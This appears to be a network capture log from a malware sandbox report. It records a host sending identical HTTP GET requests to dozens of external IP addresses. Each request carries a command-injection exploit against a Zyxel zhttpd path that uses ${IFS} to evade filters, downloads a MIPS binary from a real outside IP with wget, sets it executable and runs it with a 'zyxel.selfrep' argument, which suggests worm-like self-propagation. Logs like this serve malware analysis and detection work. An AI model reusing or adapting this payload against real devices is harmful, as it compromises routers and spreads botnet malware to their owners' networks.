                                                Jan 28, 2024 10:16:35.974081993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7135192.168.2.235125276.84.208.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974107027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7136192.168.2.233769241.178.97.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974143028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7137192.168.2.2353754213.70.88.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974154949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7138192.168.2.236081818.51.251.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974169016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7139192.168.2.2333558144.98.186.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974200010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7140192.168.2.2352680222.6.51.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974236012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7141192.168.2.23507225.237.78.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974262953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7142192.168.2.2354766210.37.48.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974292994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7143192.168.2.235596493.29.27.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974328995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7144192.168.2.234653478.40.92.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974365950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7145192.168.2.234542673.179.54.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974395037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7146192.168.2.235542660.148.122.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974426985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7147192.168.2.2353618192.204.11.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974442959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7148192.168.2.2337122164.90.39.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974474907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7149192.168.2.235013424.210.204.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974512100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7150192.168.2.234069445.11.31.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974539042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7151192.168.2.2333606180.220.26.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974598885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7152192.168.2.233382468.159.182.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974615097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7153192.168.2.234586489.179.133.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974647999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7154192.168.2.2359714102.219.103.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974689960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7155192.168.2.2347680110.233.202.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974709988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7156192.168.2.2340040223.121.97.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974745035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7157192.168.2.2358260111.126.65.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974777937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7158192.168.2.2346522213.104.113.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974802017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7159192.168.2.235322667.84.61.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974833965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7160192.168.2.2357994169.60.168.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974869013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7161192.168.2.2352278113.86.128.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974905968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7162192.168.2.235588417.209.88.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974960089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7163192.168.2.235137474.234.4.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974982023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7164192.168.2.234096634.249.172.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974994898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7165192.168.2.2332910216.95.115.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975034952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7166192.168.2.2350934144.17.14.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975071907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7167192.168.2.233490660.0.105.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975102901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7168192.168.2.2356736189.98.37.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975121975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7169192.168.2.2351090175.120.139.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975141048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7170192.168.2.2356496119.235.240.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975187063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7171192.168.2.2358296175.60.203.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975220919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7172192.168.2.235541065.151.89.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975244999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7173192.168.2.233982217.207.151.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975255966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7174192.168.2.2341086201.43.152.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975296021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7175192.168.2.2344674133.244.19.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975325108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7176192.168.2.2351972132.223.132.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975358009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7177192.168.2.2333418204.146.93.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975373983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7178192.168.2.233341251.191.55.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975399017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7179192.168.2.2352910220.52.3.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975419044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7180192.168.2.2341008194.254.163.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975431919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7181192.168.2.23367725.206.235.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975460052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7182192.168.2.2334642200.248.114.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975497007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7183192.168.2.2336774105.4.61.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975533962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7184192.168.2.2348742162.223.6.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975553989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7185192.168.2.2333926172.246.9.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975584984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7186192.168.2.2333692181.27.182.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975614071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7187192.168.2.2358250124.231.214.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975646973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7188192.168.2.2333748154.239.137.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975671053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7189192.168.2.234450286.234.243.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975697041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7190192.168.2.2343300134.155.144.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975727081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7191192.168.2.2350622144.198.52.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975764036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7192192.168.2.2338108211.6.228.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975804090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7193192.168.2.2360130161.32.233.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975822926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7194192.168.2.234522043.12.170.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975842953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7195192.168.2.2333446115.61.177.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.975871086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7196192.168.2.235150079.208.181.104443
                                                TimestampBytes transferredDirectionData
